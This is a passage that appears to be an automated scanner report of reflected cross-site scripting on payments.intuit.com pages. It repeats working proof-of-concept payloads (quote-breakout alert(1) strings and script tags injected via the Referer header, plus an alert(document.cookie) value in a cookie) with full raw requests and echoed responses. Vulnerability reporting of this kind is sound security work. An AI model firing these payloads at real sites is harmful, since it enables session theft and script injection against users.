...[SNIP]... // This is assigning the ipsRefer to a variable to capture the referring domain when redirects occure var testReferDomain="0"; var eVar17Value = 'http://www.google.com/search?hl=en&q=4c386'-alert(1)-'4f235ab0373'; </script> ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dd842'-alert(1)-'54daf563e41 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /products/quickbooks-payment-solutions/online-credit-card-processing.jsp HTTP/1.1 Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16; Referer: http://www.google.com/search?hl=en&q=dd842'-alert(1)-'54daf563e41
...[SNIP]... // This is assigning the ipsRefer to a variable to capture the referring domain when redirects occure var testReferDomain="0"; var eVar17Value = 'http://www.google.com/search?hl=en&q=dd842'-alert(1)-'54daf563e41'; </script> ...[SNIP]...
The value of the Referer HTTP header is copied into an HTML comment. The payload 6a030--><script>alert(1)</script>f0702fdbff1 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /products/quickbooks-payment-solutions/online-credit-card-processing.jsp HTTP/1.1 Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16; Referer: http://www.google.com/search?hl=en&q=6a030--><script>alert(1)</script>f0702fdbff1
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload addb8'-alert(1)-'021e03ba62f was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /products/quickbooks-payment-solutions/point-of-sale-solutions.jsp HTTP/1.1 Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16; Referer: http://www.google.com/search?hl=en&q=addb8'-alert(1)-'021e03ba62f
...[SNIP]... // This is assigning the ipsRefer to a variable to capture the referring domain when redirects occure var testReferDomain="0"; var eVar17Value = 'http://www.google.com/search?hl=en&q=addb8'-alert(1)-'021e03ba62f'; </script> ...[SNIP]...
The value of the Referer HTTP header is copied into an HTML comment. The payload a2606--><script>alert(1)</script>36ea6b49a2c was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /products/quickbooks-payment-solutions/point-of-sale-solutions.jsp HTTP/1.1 Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16; Referer: http://www.google.com/search?hl=en&q=a2606--><script>alert(1)</script>36ea6b49a2c
The value of the Referer HTTP header is copied into an HTML comment. The payload 1478c--><script>alert(1)</script>ce81d71fd63 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /products/quickbooks-payment-solutions/process-card-payments-for-mac.jsp HTTP/1.1 Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16; Referer: http://www.google.com/search?hl=en&q=1478c--><script>alert(1)</script>ce81d71fd63
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload caed3'-alert(1)-'2634c597979 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /products/quickbooks-payment-solutions/process-card-payments-for-mac.jsp HTTP/1.1 Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16; Referer: http://www.google.com/search?hl=en&q=caed3'-alert(1)-'2634c597979
...[SNIP]... // This is assigning the ipsRefer to a variable to capture the referring domain when redirects occure var testReferDomain="0"; var eVar17Value = 'http://www.google.com/search?hl=en&q=caed3'-alert(1)-'2634c597979'; </script> ...[SNIP]...
The value of the Referer HTTP header is copied into an HTML comment. The payload ef8c6--><script>alert(1)</script>b4f50ac6cd0 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /products/quickbooks-payment-solutions/quickbooks-online-billing.jsp HTTP/1.1 Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16; Referer: http://www.google.com/search?hl=en&q=ef8c6--><script>alert(1)</script>b4f50ac6cd0
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 86458'-alert(1)-'2f8b7b8371f was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /products/quickbooks-payment-solutions/quickbooks-online-billing.jsp HTTP/1.1 Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16; Referer: http://www.google.com/search?hl=en&q=86458'-alert(1)-'2f8b7b8371f
...[SNIP]... // This is assigning the ipsRefer to a variable to capture the referring domain when redirects occure var testReferDomain="0"; var eVar17Value = 'http://www.google.com/search?hl=en&q=86458'-alert(1)-'2f8b7b8371f'; </script> ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6ecbd'-alert(1)-'a54af6c28ec was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /products/quickbooks-payment-solutions/web-credit-card-processing.jsp HTTP/1.1 Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16; Referer: http://www.google.com/search?hl=en&q=6ecbd'-alert(1)-'a54af6c28ec
...[SNIP]... // This is assigning the ipsRefer to a variable to capture the referring domain when redirects occure var testReferDomain="0"; var eVar17Value = 'http://www.google.com/search?hl=en&q=6ecbd'-alert(1)-'a54af6c28ec'; </script> ...[SNIP]...
The value of the Referer HTTP header is copied into an HTML comment. The payload 38485--><script>alert(1)</script>074023fb5c0 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /products/quickbooks-payment-solutions/web-credit-card-processing.jsp HTTP/1.1 Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16; Referer: http://www.google.com/search?hl=en&q=38485--><script>alert(1)</script>074023fb5c0
The value of the Referer HTTP header is copied into an HTML comment. The payload 8809e--><script>alert(1)</script>275e11ad70b was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /support/ HTTP/1.1 Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16; Referer: http://www.google.com/search?hl=en&q=8809e--><script>alert(1)</script>275e11ad70b
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dceb5'-alert(1)-'94b519c31b1 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /support/ HTTP/1.1 Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; 